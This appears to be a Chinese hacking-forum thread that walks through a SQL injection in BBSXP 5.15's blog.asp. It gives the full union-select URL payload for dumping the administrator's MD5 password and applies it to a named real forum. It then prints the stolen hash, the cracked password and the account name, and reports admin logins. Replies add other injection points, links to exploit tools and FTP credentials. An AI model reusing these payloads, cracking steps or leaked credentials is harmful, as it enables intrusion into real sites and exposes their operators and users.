作者：中子流


首先打开www.google.com在输入Powered by：bBsxp5.15有很多这样的论坛，随便点个，好就这个bbs.yuntea.com 真幸运，这个站还没打上补丁，一口做气杀到底，bbsxp5.15最新漏洞
漏洞主要出在BLOG.ASP 可以让直接构造数据库命令  
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
后台区长的md5密码就显示出来了。
前台密码也可以出来，
网上已经有相关动画，软件。
就利用这个漏洞，肯定有一批bbsxp的网站要倒下了
接下来就是讲工具了，准备好MD5密码破解器
关于md5的破解，比较好使的有md5cracker速度增强版。
1。先用8位或9位数字跑。很快。
2。如果不行，用小写字母跑。选择5－6位比较好。
3。再不行，说明密码可能使字母加数字，可以碰碰运气。可以配置一个精品自典，比如10G的，
  跑上及几个小时。（你的机器配置必须很好）
4。再不行，建议放弃，太变态了。
前台ok...后台密码..（注：你必须知道管理员的帐号）
直接默认的配置就是直接拿下后台密码...
直接吧前台md5密码暴出来。
剩下的事就事破解md5了。
现在开始进行工作了，在http://bbs.yuntea.com/+blog.asp? ... elect%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
就成了http://bbs.yuntea.com/blog.asp?i ... elect%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
他的密码是7CB2BE65EB9F215215A0725A10B6E39E可能前台的密码和后台一样，如果有2个加密密码那就是代表1个是前台的一个是后台的，不多说了，看操作
按照上面工具的介绍先用数字把，
正在破===耐心等等
我接条信息，大家不介意把~
出来了，密码是82246124，登入，，他的帐号是wzwu，密码82246124，登入成功，后台登入，密码82246124，登入成功，下面的因该知道把，我也就不多说了，以免遭到人家的痛骂。
bBsxp5.15最新漏洞的原始作者不清，来自Guest $得黑客往事黑客网http://www.blogcn.com/user36/156544632/

是不是用cookie欺骗更方便一些呢?有的管理员真的很变态!

这是5月份的漏洞了吧。记得在哪个杂志上看过。

记得当时一起提到的还有usertop.asp中order变量未过滤，可以union查询。好像是通杀所有版本的bbsxp。还有一个manage.asp中的moveid未过滤，可以修改管理员密码或清除日志之类的。

时间有点长，记不清楚了。

顺便给大家提供一下bbsxp的利用工具。

1. code1.html
管理员密码的工具
http://snakehu.w13.zcxp.net/download/code1.html

2. code2.html
不知道干什么用的，跟上面那个一起放的。
http://snakehu.w13.zcxp.net/download/code2.html

3. bbsxptool.rar
执行sql语句的工具。
ftp://snkdown.w13.zcxp.net/others/bbsxptool.rar
(由于这个空间不提供下载。rar是以文本方式显示出来)
ftp帐号： websnkdown
ftp密码： down1234

snakehu
我好像在哪里看到过你ID？
忘了
急性差
5月份的
拿出来干吗哦？
郁闷
标着NEW
浪费心情
不实际

汗  好老了哦~~~~~~~~~~！！！
我以为又来新的了呢~！！倒塌~`111

这个版本的漏洞是仅限于sql版本的吗？

对不起，我在没有测试的情况下，就说出了这样的话，我承认不是sql也可以